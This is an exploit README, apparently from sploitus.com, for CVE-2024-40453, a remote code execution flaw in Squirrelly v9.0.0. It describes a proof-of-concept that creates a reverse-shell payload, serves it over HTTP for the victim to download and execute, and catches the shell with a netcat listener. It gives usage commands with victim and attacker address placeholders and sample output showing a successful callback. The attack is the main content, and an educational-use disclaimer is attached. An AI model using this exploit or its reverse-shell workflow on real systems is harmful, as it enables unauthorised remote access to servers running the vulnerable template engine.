Share
## https://sploitus.com/exploit?id=4A0B6094-E1B7-5AB0-92F4-258997A46C89
# CVE-2024-40453
## CVE-2024-40453 - Squirrelly v9.0.0 RCE

## Disclaimer:
This script is for educational use only. 

Do not use it for illegal purposes. 

If you do, itโ€™s entirely your responsibility; I am not liable for any misuse.

## Description

This script creates a reverse shell called `payload.sh` in the current directory.

Then it hosts an http server on port 80 for the victim to pull the `payload.sh` from.

A listener needs to be started on the attackers machine.

The http server shutdowns after 3 seconds to allow the victim to pull and execute the `payload.sh`

## EXPLANATION OF EXPLOIT 
Based on the following information, this POC was developed.
https://samuzora.com/posts/cve-2024-40453

## USAGE
Start your listener
```
rlwrap nc -nvlp 3000
```

Execute the payload
```
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

```